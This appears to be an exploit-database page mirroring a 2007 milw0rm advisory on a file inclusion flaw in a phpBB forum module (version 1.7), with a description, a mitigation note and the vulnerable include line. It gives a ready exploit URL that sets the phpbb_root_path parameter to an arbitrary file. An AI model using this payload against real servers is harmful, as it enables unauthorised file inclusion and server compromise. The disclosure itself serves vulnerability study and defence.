header-logo
Suggest Exploit
vendor:
phpBB Module Forum picture and META tags
by:
bd0rk
7.5
CVSS
HIGH
File Include
CWE
Product Name: phpBB Module Forum picture and META tags
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

phpBB Module Forum picture and META tags 1.7 File Include Vulnerability

This vulnerability exists in the phpBB Module Forum picture and META tags 1.7. It allows an attacker to include arbitrary files by exploiting the 'MOD_forum_fields_parse.php' script, which does not properly declare the 'phpbb_root_path' variable. By manipulating the 'phpbb_root_path' parameter in the URL, an attacker can include any file on the server.

Mitigation:

The vendor should release a patch to properly declare the 'phpbb_root_path' variable in the script. Until a patch is available, users should remove or disable the vulnerable module.
Source

Exploit-DB raw data:

Exploitname: phpBB Module Forum picture and META tags 1.7 File Include Vulnerability

Vendor: http://www.rfnnet.nl/downloads/phpbb/MOD_Forum_picture_and_META_tags.zip

Founder: bd0rk

Contact: bd0rk[at]hackermail.com

Greetings: str0ke, TheJT, Lu7k, CodeR

Vulnerable in MOD_forum_fields_parse.php: include($phpbb_root_path . 'MOD_forum_fields_default.php');

#$phpbb_root_path is not declared!



[+]Exploit: http://[target]/[module_path]/MOD_forum_fields_parse.php?phpbb_root_path=FILE  

# milw0rm.com [2007-03-30]

Navigation

Suggest Exploit

Services By CQR